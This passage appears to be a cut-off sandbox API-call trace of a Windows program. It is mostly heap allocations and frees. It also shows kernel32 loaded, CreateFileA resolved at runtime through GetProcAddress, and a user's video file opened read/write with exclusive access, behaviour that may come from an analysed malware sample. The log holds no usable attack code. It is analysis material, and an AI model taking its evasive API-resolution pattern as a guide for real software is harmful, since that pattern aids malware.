Size=0x10) returned 0x8899d0 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0043.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0043.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.026] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.028] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0043.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889610 [0043.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0043.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.029] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0043.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0043.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0043.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0043.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.029] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0043.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0043.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0043.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\g 0Qi.mkv", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0043.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3e) returned 0x7ab260 [0043.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\g 0Qi.mkv", cchWideChar=62, lpMultiByteStr=0x7ab260, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\g 0Qi.mkv", lpUsedDefaultChar=0x0) returned 62 [0043.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.031] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\g 0Qi.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\g 0qi.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0043.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=62, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7c) returned 0x7d5bb8 [0043.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=62, lpWideCharStr=0x7d5bb8, cchWideChar=62 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\g 0Qi.mkv") returned 62 [0043.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0043.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0043.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.033] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 